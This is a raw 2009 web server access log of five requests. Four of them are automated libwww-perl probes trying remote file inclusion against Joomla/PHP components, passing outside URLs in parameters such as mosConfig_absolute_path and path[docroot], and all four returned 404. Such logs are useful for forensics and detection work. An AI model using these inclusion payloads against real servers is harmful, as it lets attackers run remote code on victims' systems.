158.132.12.80 - - [04/Feb/2009:19:12:21 -0600] "GET /logs/access_log.1216944000 HTTP/1.0" 206 32768 "http://hk.search.yahoo.com/search?p=pconline.com&fr=FP-tab-web-t&ei=UTF-8&meta=rst%3Dhk""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"
122.201.73.62 - - [04/Feb/2009:19:12:28 -0600] "GET /logs/access_log.1211414400/index.php?option=com_page_cache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
84.21.71.133 - - [04/Feb/2009:19:14:23 -0600] "GET /logs/access_log.1212364800//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
84.21.71.133 - - [04/Feb/2009:19:14:23 -0600] "GET //include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
84.21.71.133 - - [04/Feb/2009:19:14:23 -0600] "GET /logs//include.php?path[docroot]=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
